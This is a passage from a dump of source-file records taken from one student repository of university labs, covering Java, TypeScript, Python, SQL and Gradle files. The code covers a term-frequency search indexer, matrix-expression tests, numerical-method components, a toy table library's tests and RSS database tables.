};\r\n\r\n\r\n private MachineState machineState;\r\n\r\n PatternState(MachineState machineState) {\r\n this.machineState = machineState;\r\n }\r\n\r\n public abstract PatternState nextState(Event e);\r\n\r\n public MachineState getMachineState() {\r\n return machineState;\r\n }\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6057818531990051, "alphanum_fraction": 0.6254927515983582, "avg_line_length": 19.13888931274414, "blob_id": "24927ae29bd7e61f35d29b37a51f43b6275b06f1", "content_id": "09f87bfe9fc01c2dacd775a137fc182e66ba0606", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 761, "license_type": "no_license", "max_line_length": 85, "num_lines": 36, "path": "/otp/build.gradle", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "version=0.1\r\n\r\napply plugin: 'antlr'\r\napply plugin: 'java'\r\n\r\nrepositories {\r\n jcenter()\r\n}\r\n\r\ntask fatJar(type: Jar) {\r\n\tmanifest {\r\n attributes 'Implementation-Title': 'Osnovi technologij programuvannya',\r\n \t'Implementation-Version': version\r\n }\r\n baseName = project.name + '-all'\r\n from { configurations.compile.collect { it.isDirectory() ? it : zipTree(it) } }\r\n with jar\r\n}\r\n\r\ndependencies {\r\n antlr 'org.antlr:antlr4:4.6'\r\n compile 'commons-io:commons-io:2.5'\r\n compile 'gov.nist.math:jama:1.0.3'\r\n testCompile 'junit:junit:4.12'\r\n testCompile 'org.hamcrest:hamcrest-library:1.3'\r\n}\r\n\r\ngenerateGrammarSource{\r\n arguments+=['-visitor']\r\n}\r\n\r\ntest{\r\n testLogging{\r\n exceptionFormat \"full\"\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.5784804224967957, "alphanum_fraction": 0.5813841223716736, "avg_line_length": 33.02259826660156, "blob_id": "d1fad1deaf7e4f68388afc752292cc56cfb5b124", "content_id": "e3851cae444a73f0bfe67df9bbf929bfe2d3cdda", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 6199, "license_type": "no_license", "max_line_length": 98, "num_lines": 177, "path": "/oldtest/rss-reader/src/main/java/io/github/k_gregory/otp/rss_reader/SearchService.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.otp.rss_reader;\r\n\r\nimport com.google.common.collect.SortedSetMultimap;\r\nimport com.google.common.collect.TreeMultimap;\r\nimport org.springframework.util.StreamUtils;\r\n\r\nimport java.io.IOException;\r\nimport java.nio.charset.Charset;\r\nimport java.nio.charset.StandardCharsets;\r\nimport java.util.HashMap;\r\nimport java.util.Map;\r\nimport java.util.SortedSet;\r\nimport java.util.TreeSet;\r\nimport java.util.regex.Pattern;\r\nimport java.util.stream.Collectors;\r\nimport java.util.stream.Stream;\r\n\r\nclass Document {\r\n @Override\r\n public String toString() {\r\n return \"Document{\" +\r\n \"text='\" + text + '\\'' +\r\n '}';\r\n }\r\n\r\n public String getText() {\r\n return text;\r\n }\r\n\r\n private final String text;\r\n\r\n\r\n public Document(String text) {\r\n this.text = text;\r\n }\r\n\r\n public Map<String, Long> calculateTermCount() {\r\n Pattern nonWord = Pattern.compile(\"[^\\\\w\\\\d]+\", Pattern.UNICODE_CHARACTER_CLASS);\r\n Pattern nonWordStart = Pattern.compile(\"^[^\\\\w\\\\d]+\", Pattern.UNICODE_CHARACTER_CLASS);\r\n String clearedStartText = nonWordStart\r\n .matcher(text)\r\n .replaceFirst(\"\");\r\n\r\n Map<String, Long> collect = Stream.of(nonWord.split(clearedStartText.toLowerCase()))\r\n .collect(Collectors.groupingBy(String::toString, Collectors.counting()));\r\n return collect;\r\n }\r\n}\r\n\r\nclass TermDocumentInfo implements Comparable<TermDocumentInfo> {\r\n private final Document document;\r\n private final long termFrequency;\r\n\r\n TermDocumentInfo(Document document, long termFrequency) {\r\n this.document = document;\r\n this.termFrequency = termFrequency;\r\n }\r\n\r\n @Override\r\n public String toString() {\r\n return \"TermDocumentInfo{\" +\r\n \"document=\" + document +\r\n \", termFrequency=\" + termFrequency +\r\n '}';\r\n }\r\n\r\n @Override\r\n public boolean equals(Object o) {\r\n if (this == o) return true;\r\n if (o == null || getClass() != o.getClass()) return false;\r\n\r\n TermDocumentInfo that = (TermDocumentInfo) o;\r\n\r\n if (termFrequency != that.termFrequency) return false;\r\n return document.equals(that.document);\r\n }\r\n\r\n @Override\r\n public int hashCode() {\r\n int result = document.hashCode();\r\n result = 31 * result + (int) (termFrequency ^ (termFrequency >>> 32));\r\n return result;\r\n }\r\n\r\n @Override\r\n public int compareTo(TermDocumentInfo o) {\r\n int tc = Long.compare(termFrequency, o.termFrequency);\r\n return tc == 0 ? document.getText().compareTo(o.document.getText()) : tc;\r\n /*\r\n int docCompare = document.getText().compareTo(o.document.getText());\r\n return docCompare == 0 ? Long.compare(termFrequency, o.termFrequency) : docCompare;\r\n */\r\n }\r\n}\r\n\r\npublic class SearchService {\r\n private Map<String, Long> termFrequency = new HashMap<>();\r\n private SortedSetMultimap<String, TermDocumentInfo> termDocumentIndex = TreeMultimap.create();\r\n // private Map<String, SortedSet<TermDocumentInfo>> ttt = new HashMap<>();\r\n\r\n public static void main(String... args) throws IOException {\r\n\r\n SearchService search = new SearchService();\r\n String s = StreamUtils\r\n .copyToString(\r\n SearchService.class.getClassLoader().getResourceAsStream(\"pap.txt\")\r\n , StandardCharsets.UTF_8\r\n );\r\n\r\n for(int i = 0; i < 5; i++)\r\n search.indexDocument(new Document(s+i));\r\n search = new SearchService();\r\n\r\n long l = System.currentTimeMillis();\r\n search.indexDocument(new Document(s));\r\n System.out.println(System.currentTimeMillis() - l);\r\n /*\r\n System.out.println((System.currentTimeMillis() - l));\r\n search.indexDocument(new Document(\"hi there fuck\"));\r\n search.indexDocument(new Document(\"fuck you\"));\r\n search.indexDocument(new Document(\"fuck you, you ASShole\"));\r\n search.indexDocument(new Document(\"asshole in sight, lol\"));\r\n search.search(\"you\");\r\n System.out.println(search.termFrequency);\r\n System.out.println(search.termDocumentIndex);\r\n */\r\n\r\n }\r\n\r\n private double cosineSimilarity(Document d1, Document q){\r\n Map<String, Long> d1tf = d1.calculateTermCount();\r\n Map<String, Long> qtf = q.calculateTermCount();\r\n qtf\r\n .entrySet()\r\n .stream()\r\n .map(e->e.getValue()/(double)termFrequency.get(e.getKey()))\r\n .map(c->c*c);\r\n return 0;\r\n //.collect(Collectors.su)\r\n }\r\n\r\n public void search(String query){\r\n Document q = new Document(query);\r\n Map<String, Long> queryTermCount = q.calculateTermCount();\r\n queryTermCount\r\n .keySet()\r\n .stream()\r\n .flatMap(k -> termDocumentIndex.get(k).stream())\r\n .sorted((o1, o2) -> {\r\n return 0;\r\n })\r\n .forEach(System.out::println);\r\n }\r\n\r\n public void indexDocument(Document document) {\r\n Map<String, Long> documentWordCount = document.calculateTermCount();\r\n for (Map.Entry<String, Long> termInfo : documentWordCount.entrySet()) {\r\n termFrequency.put(\r\n termInfo.getKey(),\r\n termFrequency.getOrDefault(termInfo.getKey(), 0L) + 1\r\n );\r\n /*SortedSet<TermDocumentInfo> termDocumentInfos = ttt.get(termInfo.getKey());\r\n if(termDocumentInfos == null){\r\n termDocumentInfos = new TreeSet<>();\r\n }\r\n termDocumentInfos.add(new TermDocumentInfo(document, termInfo.getValue()));\r\n ttt.put(termInfo.getKey(), termDocumentInfos);\r\n */\r\n //long l = System.nanoTime();\r\n termDocumentIndex.put(\r\n termInfo.getKey(),\r\n new TermDocumentInfo(document, termInfo.getValue())\r\n );\r\n //System.out.println(System.nanoTime()- l);\r\n }\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6586102843284607, "alphanum_fraction": 0.6586102843284607, "avg_line_length": 22.64285659790039, "blob_id": "cdb4351c13737fa03629de0d4ec0357b2d725534", "content_id": "2c0006a0456bc4b4ae848eb0a0e42e3154aa4e1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 331, "license_type": "no_license", "max_line_length": 59, "num_lines": 14, "path": "/insurance/backend/src/main/java/io/github/k_gregory/insurance/exception/UserExistsException.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.insurance.exception;\n\npublic class UserExistsException extends RuntimeException {\n private final String name;\n\n public UserExistsException(String name) {\n super(\"User \" + name + \" already exists\");\n this.name = name;\n }\n\n public String getName() {\n return name;\n }\n}\n" }, { "alpha_fraction": 0.7283422350883484, "alphanum_fraction": 0.7283422350883484, "avg_line_length": 28.21875, "blob_id": "ab81c36a2aa2edf7e498c508615773f0672fc1a6", "content_id": "982c21bc24ca5916ef5756d261534742d01a582f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1055, "license_type": "no_license", "max_line_length": 98, "num_lines": 32, "path": "/numerical-methods/src/app/routes.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import {Routes} from \"@angular/router\";\nimport {TrapezoidComponent} from \"./trapezoid/trapezoid.component\";\nimport {NewtonSecondEvenlyComponent} from \"./newton-second-evenly/newton-second-evenly.component\";\nimport {NewtonFirstComponent} from \"./newton-first/newton-first.component\";\nimport {RombergComponent} from \"./romberg/romberg.component\";\n\n\nexport const routes: Routes = [{\n path: 'interpolation/newton-second-evenly',\n component: NewtonSecondEvenlyComponent,\n data: {\n name: 'Другий метод Ньютона з рівновіддаленими вузлами'\n }\n}, {\n path: 'interpolation/newton-first',\n component: NewtonFirstComponent,\n data: {\n name: 'Перший метод Ньютона з нерівновіддаленими вузлами'\n }\n}, {\n path: 'integration/trapezoid',\n component: TrapezoidComponent,\n data: {\n name: 'Складена квадратурна формула трапецій'\n }\n}, {\n path: 'integration/romberg',\n component: RombergComponent,\n data: {\n name: 'Алгоритм Ромберга'\n }\n}];\n" }, { "alpha_fraction": 0.5976470708847046, "alphanum_fraction": 0.6058823466300964, "avg_line_length": 22.61111068725586, "blob_id": "5a03665751b4979580d3d1ccaaf83daa72c08b0b", "content_id": "6e9b765582bef77ac34e7b79560b4d45fa2eab34", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 850, "license_type": "no_license", "max_line_length": 75, "num_lines": 36, "path": "/numerical-methods/src/app/csv.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import * as Papa from 'papaparse'\n\nexport function decodeCsv(csvSrc): {x: number, y: number}[] {\n const data = Papa.parse(csvSrc);\n if(data.errors.length != 0) {\n console.log(data.errors);\n throw new Error(\"Can't parse\");\n }\n\n const arr: any[] = data.data;\n\n const map = arr\n .filter(c=>c.length == 2)\n .map(el=>({x: Number.parseFloat(el[0]), y: Number.parseFloat(el[1])}));\n\n map.forEach(el=>{\n if(isNaN(el.x) || isNaN(el.y))\n throw new Error(\"Not a number\")\n });\n\n return map;\n}\n\nexport function getControls(csvSrc: string): number[] {\n const data = Papa.parse(csvSrc);\n if(data.errors.length != 0){\n console.log(data.errors);\n throw new Error(\"Can't parse\")\n }\n\n return data.data.filter(e=>e.length != 0)[0].map(e=>{\n const r = parseFloat(e);\n if(isNaN(r)) throw new Error(\"Nan\");\n return r;\n });\n}\n" }, { "alpha_fraction": 0.6048387289047241, "alphanum_fraction": 0.6451612710952759, "avg_line_length": 19.66666603088379, "blob_id": "9a605a42e27c75efdb0db06f8962edfed30e1df9", "content_id": "6eca772f1467b29f4eee49e4c01cea35eaccdb8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 496, "license_type": "no_license", "max_line_length": 71, "num_lines": 24, "path": "/cg/cg-lab6/build.gradle", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "group 'cglabs'\nversion '1.0-SNAPSHOT'\n\napply plugin: 'java'\n\nsourceCompatibility = 1.8\n\nrepositories {\n mavenCentral()\n\n maven {\n url \"http://nexus.talanlabs.com/content/repositories/releases/\"\n }\n}\n\ndependencies {\n compile group: 'java3d', name: 'j3dcore', version: '1.5.2'\n compile group: 'java3d', name: 'j3dutils', version: '1.5.2'\n compile group: 'javax.vecmath', name: 'vecmath', version: '1.5.2'\n\n\n\n testCompile group: 'junit', name: 'junit', version: '4.12'\n}\n" }, { "alpha_fraction": 0.6331025958061218, "alphanum_fraction": 0.6551290154457092, "avg_line_length": 20.76712417602539, "blob_id": "7896d64b661d806c7e77b43333794d0c697e7b15", "content_id": "8ed3a8a08c74ec8fe6dcd76e1435676b1d3479d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3178, "license_type": "no_license", "max_line_length": 63, "num_lines": 146, "path": "/db/lab1/test.py", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "from lab1.data import Table, Attribute, autoinc\n\n# Tables can have attributes\nt = Table(Attribute(\"Check\"))\n\n# Tables default is used\nv = Attribute(\"lol\", default=autoinc)\nt = Table(Attribute(\"some\", default=autoinc()))\nt.add(**{})\nt.add(**{})\nr = t.find()\nassert len(r)==2\nassert r[0]['some'] == 1\nassert r[1]['some'] == 2\n\n# Tables must have at least one attribute\ntry:\n t = Table()\n assert False\nexcept ValueError:\n assert True\n\n# Tables can't have duplicate attribute names\ntry:\n t = Table(Attribute(\"a\"), Attribute(\"a\"))\n assert False\nexcept ValueError:\n assert True\n\n# Tables can't give reference to non-existent field\ntry:\n t = Table(Attribute(\"foo\"))\n r = t.reference(\"bar\")\n assert False\nexcept ValueError:\n assert True\n\n# Tables can't give reference to non-unique field\ntry:\n t = Table(Attribute(\"foo\", unique=False))\n r = t.reference(\"foo\")\n assert False\nexcept ValueError:\n assert True\n\n# Tables can't bee searched by non-existent attributes\ntry:\n t = Table(Attribute(\"foo\"))\n x = t.find(bar= 42)\n assert False\nexcept ValueError:\n assert True\n\n# Added rows can be found\nt = Table(Attribute(\"x\"), Attribute(\"y\"))\nt.add(x=1, y=3)\nt.add(x=2, y=4)\nl = t.find(x=2)\nassert len(l) == 1\nassert l[0]['y'] == 4\n\n\n# Unique attribute can't be dublicated\ntry:\n t = Table(Attribute(\"foo\", unique=True))\n t.add(foo=42)\n t.add(foo=42)\n assert False\nexcept ValueError:\n assert True\n\n# Reference existence is checked\ntry:\n a = Table(Attribute(\"foo\", unique=True))\n b = Table(Attribute(\"a_foo\", reference=a.reference(\"foo\")))\n b.add(a_foo=42)\n assert False\nexcept ValueError:\n assert True\n\n# Reference existence is positively checked\na = Table(Attribute(\"foo\", unique=True))\nb = Table(Attribute(\"a_foo\", reference=a.reference(\"foo\")))\na.add(foo=42)\nb.add(a_foo=42)\n\n\n# Can't modify referenced row\nt = Table(Attribute(\"foo\", unique=True))\nd = Table(Attribute(\"foo_ref\", reference = t.reference(\"foo\")))\nt.add(foo=1)\nt.add(foo=15)\nd.add(foo_ref=1)\nt.check_modify(t.find(foo=15)[0], t.attributes[\"foo\"])\ntry:\n t.check_modify(t.find(foo=1)[0], t.attributes[\"foo\"])\n assert False\nexcept ValueError:\n assert True\n\n\n# Update updates all needed rows\nt = Table(Attribute(\"a\"), Attribute(\"b\"))\nt.add(a=1, b=2)\nt.add(a=1, b=4)\nt.add(a=2, b=0)\nt.update(t.find(a=1), b=\"updated\")\nr = t.find(a=1)\nassert len(r) == 2\nassert r[0][\"b\"] == r[1][\"b\"] == \"updated\"\nassert t.find(a=2)[0][\"b\"] == 0\n\n\n# Can't update referenced fields\nt = Table(Attribute(\"foo\", unique=True))\nd = Table(Attribute(\"foo_ref\", reference=t.reference(\"foo\")))\nt.add(foo=42)\nt.update(t.find(foo=42), foo=24)\nd.add(foo_ref=24)\ntry:\n t.update(t.find(foo=24), foo=1)\n assert False\nexcept ValueError:\n assert True\n\n\n# Can delete\nt = Table(Attribute(\"foo\"))\nt.add(foo=1)\nt.delete(t.find(foo=1))\nassert len(t.find()) == 0\n\n# Can't delete referenced\nt = Table(Attribute(\"foo\", unique=True))\nd = Table(Attribute(\"lol\", reference = t.reference(\"foo\")))\nt.add(foo=1)\nt.add(foo=2)\nd.add(lol=1)\nd.add(lol=2)\nd.delete(d.find(lol=2))\nt.delete(t.find(foo=2))\ntry:\n t.delete(t.find(foo=1))\n assert False\nexcept ValueError:\n assert True\n" }, { "alpha_fraction": 0.5925233364105225, "alphanum_fraction": 0.6168224215507507, "avg_line_length": 34.66666793823242, "blob_id": "19a63f4cd89179635df45fd64c7cbeb23e08c26c", "content_id": "6a3a0c308293193b809c134c5d81ed2e0900a668", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 1070, "license_type": "no_license", "max_line_length": 72, "num_lines": 30, "path": "/scsearch/src/main/resources/db/migration/V1__initial_tables.sql", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "CREATE TABLE rss_feed (\n id BIGINT PRIMARY KEY AUTO_INCREMENT NOT NULL,\n url VARCHAR(200) UNIQUE NOT NULL,\n link VARCHAR(200) NOT NULL,\n title VARCHAR(300) NOT NULL,\n description VARCHAR(1000) NOT NULL,\n last_update TIMESTAMP NOT NULL DEFAULT(CURRENT_TIMESTAMP())\n);\n\nCREATE TABLE rss_item (\n id BIGINT PRIMARY KEY AUTO_INCREMENT NOT NULL,\n title VARCHAR(300),\n link VARCHAR(200),\n description TEXT,\n td_length DOUBLE NOT NULL,\n feed_id BIGINT NOT NULL REFERENCES rss_feed (id),\n pub_time TIMESTAMP NOT NULL DEFAULT(CURRENT_TIMESTAMP())\n);\n\nCREATE TABLE term (\n value VARCHAR(200) PRIMARY KEY NOT NULL,\n document_frequency BIGINT NOT NULL DEFAULT 0\n);\n\nCREATE TABLE rss_item_terms (\n rss_item_id BIGINT REFERENCES rss_item (id),\n term_value VARCHAR(200) REFERENCES term (value),\n usages INT NOT NULL,\n CONSTRAINT rss_item_term_value_unique UNIQUE (rss_item_id, term_value)\n);\n" }, { "alpha_fraction": 0.7277734279632568, "alphanum_fraction": 0.7277734279632568, "avg_line_length": 26.042552947998047, "blob_id": "4aff957043a7ab9b8e84d74b614ed85667bb4a0d", "content_id": "d8bd67def15dd72aeba0ea35642dafa9290a5cb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1271, "license_type": "no_license", "max_line_length": 91, "num_lines": 47, "path": "/insurance/frontend/src/app/supporter-consultation/supporter-consultation.component.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import { Component, OnInit } from '@angular/core';\nimport {ClientInfo, SupporterConsultationService} from '../supporter-consultation.service';\nimport {isUndefined} from 'util';\n\n@Component({\n selector: 'app-supporter-consultation',\n templateUrl: './supporter-consultation.component.html',\n styleUrls: ['./supporter-consultation.component.css']\n})\nexport class SupporterConsultationComponent implements OnInit {\n constructor(public consultation: SupporterConsultationService) { }\n message: string = \"\";\n\n get clients(): ClientInfo[] {\n const res = [];\n for(let key in this.consultation.clients)\n res.push(this.consultation.clients[key])\n return res;\n }\n\n get currentMessages(){\n if(isUndefined(this.consultation.selectedClient)) return [];\n return this.consultation.clients[this.consultation.selectedClient].messages\n }\n\n selectClient(clientId: string){\n this.consultation.selectClient(clientId);\n this.consultation.clients[clientId].hasNewMessages = false;\n }\n\n assignClient(id: string){\n this.consultation.assignClient(id)\n }\n\n unassignClient(id: string){\n this.consultation.unassignClient(id)\n }\n\n answer(){\n this.consultation.writeAnswer(this.message);\n }\n\n ngOnInit() {\n this.consultation.refreshFree();\n }\n\n}\n" }, { "alpha_fraction": 0.6691498756408691, "alphanum_fraction": 0.6818580031394958, "avg_line_length": 31.140844345092773, "blob_id": "af865a8a7f0b56b5163c458e0953b123166cf3d1", "content_id": "ae816132c55c89ed70debf5f6097d77e167bf8ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2282, "license_type": "no_license", "max_line_length": 101, "num_lines": 71, "path": "/despat/src/main/java/io/bitbucket/gregoryk1/despat/lab5/task2/Application.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.bitbucket.gregoryk1.despat.lab5.task2;\n\nabstract class ObservatoryColleague {\n public final String name;\n protected ObservatoryMediator mediator;\n protected String starName;\n public ObservatoryColleague(String name, ObservatoryMediator mediator) {\n this.name = name;\n this.mediator = mediator;\n }\n\n public void trackStar(String name) {\n this.starName = name;\n }\n\n public void sendStarData() {\n mediator.receiveStarData(starName, this);\n }\n}\n\nclass ConcreteObservatory extends ObservatoryColleague {\n public ConcreteObservatory(ObservatoryMediator mediator, String name) {\n super(name, mediator);\n }\n\n @Override\n public void trackStar(String name) {\n System.out.println(this.name + \" starts tracking \" + name);\n super.trackStar(name);\n }\n\n}\n\nabstract class ObservatoryMediator {\n abstract public void receiveStarData(String name, ObservatoryColleague colleague);\n}\n\nclass ConcreteObservatoryMediator extends ObservatoryMediator {\n private ObservatoryColleague observatory1 = new ConcreteObservatory(this, \"Eastern Observatory\");\n private ObservatoryColleague observatory2 = new ConcreteObservatory(this, \"Western Observatory\");\n\n @Override\n public void receiveStarData(String name, ObservatoryColleague colleague) {\n System.out.println(\"Received info about \" + name + \" from \" + colleague.name);\n }\n\n\n public void watch(String star) {\n System.out.println(\"########### We need to track \" + star + \" today ########\");\n\n System.out.println(\"Can watch \" + star + \" from 00:00 to 12:00 from \" + observatory1.name);\n observatory1.trackStar(star);\n observatory1.sendStarData();\n observatory1.sendStarData();\n System.out.println();\n\n System.out.println(\"Can watch \" + star + \" from 12:00 to 23:59 from \" + observatory2.name);\n observatory2.trackStar(star);\n observatory2.sendStarData();\n observatory2.sendStarData();\n System.out.println();\n }\n}\n\npublic class Application {\n public static void main(String... args) {\n ConcreteObservatoryMediator mediator = new ConcreteObservatoryMediator();\n mediator.watch(\"Sirius\");\n mediator.watch(\"Aldebaran\");\n }\n}\n" }, { "alpha_fraction": 0.48450136184692383, "alphanum_fraction": 0.5384097099304199, "avg_line_length": 28.703447341918945, "blob_id": "8cf65ad7d5f6861d93fae600e52deb93b7f6748c", "content_id": "786e1ffabe0761919ff561604ea2296ef275cce8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4452, "license_type": "no_license", "max_line_length": 115, "num_lines": 145, "path": "/otp/src/test/java/io/github/k_gregory/otp/lab2/EvalutionsTests.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.otp.lab2;\r\n\r\nimport Jama.Matrix;\r\nimport io.github.k_gregory.otp.lab1.ParseException;\r\nimport io.github.k_gregory.otp.lab2.datatypes.MathVal;\r\nimport io.github.k_gregory.otp.lab2.datatypes.NumVal;\r\nimport io.github.k_gregory.otp.lab2.datatypes.VectorVal;\r\nimport org.junit.Test;\r\n\r\nimport java.util.Arrays;\r\n\r\nimport static org.junit.Assert.assertEquals;\r\n\r\npublic class EvalutionsTests {\r\n\r\n private MathVal calculate(String expression) {\r\n return new MatrixEvalutor().evalute(expression);\r\n }\r\n\r\n private void assertCalculate(MathVal expected, String expression) {\r\n assertEquals(expected, calculate(expression));\r\n }\r\n\r\n private void assertNumVal(Double v, String expression) {\r\n assertCalculate(new NumVal(v), expression);\r\n }\r\n\r\n private void assertNumVecVal(String expression, Double... doubles) {\r\n assertCalculate(new VectorVal(Arrays.stream(doubles).map(NumVal::new).toArray(NumVal[]::new)), expression);\r\n }\r\n\r\n @Test(expected = ParseException.class)\r\n public void bracketsMatch() {\r\n calculate(\"1+[[13]\");\r\n }\r\n\r\n @Test(expected = ParseException.class)\r\n public void noExtraParsed() {\r\n calculate(\"1+2 ololo some\");\r\n }\r\n\r\n @Test\r\n public void memoryDurability() {\r\n MatrixEvalutor evalutor = new MatrixEvalutor();\r\n evalutor.evalute(\"c=42\");\r\n assertEquals(new NumVal(2.d), evalutor.evalute(\"c-40\"));\r\n }\r\n\r\n @Test\r\n public void spacesAreAllowed() {\r\n assertNumVal(2.d, \"1 + 1\");\r\n assertNumVal(5.d, \" a = 1 ; 4 + a ;\");\r\n }\r\n\r\n @Test\r\n public void simpleAlgebra() {\r\n assertNumVal(4.d, \"2+2;\");\r\n assertNumVal(1.d, \"1+0\");\r\n assertNumVal(1.d, \"0+1\");\r\n assertNumVal(5.d, \"10/2\");\r\n assertNumVal(3.d, \"6-(2+2)/2-1;\");\r\n\r\n assertNumVal(5.d, \"|-5|\");\r\n }\r\n\r\n @Test\r\n public void vectorAlgebra() {\r\n assertNumVecVal(\"[1]+[0]\", 1.d);\r\n assertNumVecVal(\"[0]+[1]\", 1.d);\r\n assertNumVecVal(\"[-5,2,15]x[6,1,-2]\", -19.d, 80.d, -17.d);\r\n }\r\n\r\n @Test\r\n public void assignment() {\r\n assertNumVal(4.d, \"a=4\");\r\n assertNumVal(5.d, \"a=5;a;\");\r\n assertNumVal(32.d, \"a=3;b=7;c=a+b;c/5+c*3\");\r\n assertNumVecVal(\"[0]\", 0.d);\r\n assertNumVecVal(\"a=[1,2];b=[0,-4];c=a+b\", 1.d, -2.d);\r\n }\r\n\r\n @Test\r\n public void vectorAssignment() {\r\n assertNumVecVal(\"[1]\", 1.d);\r\n assertNumVecVal(\"[1,2]\", 1.d, 2.d);\r\n assertNumVecVal(\"[-1]\", -1.d);\r\n }\r\n\r\n @Test\r\n public void vectorScalar() {\r\n assertNumVecVal(\"[1,2,3]*2\", 2.d, 4.d, 6.d);\r\n assertNumVecVal(\"1/10*[10,20,30]\", 1.d, 2.d, 3.d);\r\n assertNumVecVal(\"1/10*[10,-20,30]\", 1.d, -2.d, 3.d);\r\n }\r\n\r\n @Test\r\n public void nestedVectors() {\r\n assertCalculate(new VectorVal(new VectorVal(new NumVal(1.d))), \"[[1]]\");\r\n assertNumVal(6.5, \"[[0.5]]*[[13]]\");\r\n assertCalculate(new VectorVal(new VectorVal(new NumVal(-4.d))), \"[[1]]+[[-5]]\");\r\n assertNumVal(40.d, \"[([1,2]*[2,3]),4]*[3,4]\");\r\n assertNumVecVal(\"[1,2,3]x[1,rank([[1,2],[3,4]]),1]\", -4.d, 2.d, 0.d);\r\n }\r\n\r\n @Test\r\n public void matrixTranspose() {\r\n Matrix matrix = new Matrix(new double[][]{{1, 2, 3}, {4, 5, 6}});\r\n assertCalculate(VectorVal.fromMatrix(matrix), \"[[1,4],[2,5],[3,6]]^t\");\r\n assertCalculate(VectorVal.fromMatrix(matrix).transpose(), \"[[1,4],[2,5],[3,6]]\");\r\n }\r\n\r\n @Test\r\n public void matrixInverse() {\r\n assertCalculate(VectorVal.fromMatrix(new Matrix(new double[][]{\r\n {1, 2},\r\n {3, 4}\r\n })), \"[[-2,1],[3/2,-1/2]]^1\");\r\n }\r\n\r\n @Test\r\n public void matrixMult() {\r\n assertCalculate(VectorVal.fromMatrix(new Matrix(new double[][]{\r\n {58, 64},\r\n {139, 154}\r\n })), \"[[1,2,3],[4,5,6]].[[7,8],[9,10],[11,12]]\");\r\n }\r\n\r\n @Test\r\n public void matrixRank() {\r\n assertNumVal(2.d, \"rank([[1,2,3],[4,5,6],[7,8,9]])\");\r\n }\r\n\r\n @Test\r\n public void matrixDet() {\r\n assertNumVal(-48.d, \"det([[1,2,3],[4,9,6],[7,8,9]])\");\r\n }\r\n\r\n @Test\r\n public void variant6() {\r\n assertCalculate(new VectorVal(\r\n new VectorVal(new NumVal(0.5), new NumVal(1.d)),\r\n new VectorVal(new NumVal(1.5), new NumVal(2.d))\r\n ), \"[[1,2],[3,4]]/rank([[1,2],[3,4]])\");\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.7427785396575928, "alphanum_fraction": 0.7427785396575928, "avg_line_length": 29.29166603088379, "blob_id": "7b9795d0d9deb46a6b72f8274ae8e9a73e3f1470", "content_id": "f292cb248ffff097bf7d4541d2667a81403736bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 727, "license_type": "no_license", "max_line_length": 73, "num_lines": 24, "path": "/insurance/frontend/src/app/client-consultation/client-consultation.component.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import { Component, OnInit } from '@angular/core';\nimport {ClientConsultationService} from '../client-consultation.service';\nimport {SupportMessage} from '../../consultation/ConsultationMessage';\n\n@Component({\n selector: 'app-client-consultation',\n templateUrl: './client-consultation.component.html',\n styleUrls: ['./client-consultation.component.css']\n})\nexport class ClientConsultationComponent implements OnInit {\n currentMessage: string = \"\";\n messages: SupportMessage[];\n\n constructor(private consultation: ClientConsultationService) { }\n\n ngOnInit() {\n this.messages = this.consultation.messages;\n }\n\n addMessage(){\n this.consultation.writeQuestion(this.currentMessage);\n this.currentMessage=\"\";\n }\n}\n" }, { "alpha_fraction": 0.594936728477478, "alphanum_fraction": 0.597468376159668, "avg_line_length": 20.351350784301758, "blob_id": "b9ab6e0cf016fdd8b5e44855fb850f9b51774db3", "content_id": "05b73fe45af55ef315dd8af0e5fc8a366a03297c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 790, "license_type": "no_license", "max_line_length": 68, "num_lines": 37, "path": "/numerical-methods/src/app/romberg/romberg.component.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import { Component, OnInit } from '@angular/core';\nimport {romberg, RombergResult} from \"../romberg\";\nimport {f, h, l} from \"../f\";\n\n@Component({\n selector: 'app-romberg',\n templateUrl: './romberg.component.html',\n styleUrls: ['./romberg.component.css']\n})\nexport class RombergComponent implements OnInit {\n e: string = \"1e-9\";\n result?: RombergResult = null;\n error?: string;\n\n constructor() {}\n\n ngOnInit() {\n }\n\n calc(){\n const e = parseFloat(this.e);\n if(isNaN(e)){\n this.error = \"Can't parse accuracy\";\n return;\n }\n\n const res = romberg(f, l, h, e);\n this.result = res;\n\n const maxLen = Math.max.apply(null, res.table.map(e=>e.length));\n for(const a of res.table){\n for(let i = a.length; i < maxLen; i++)\n a.push(null)\n 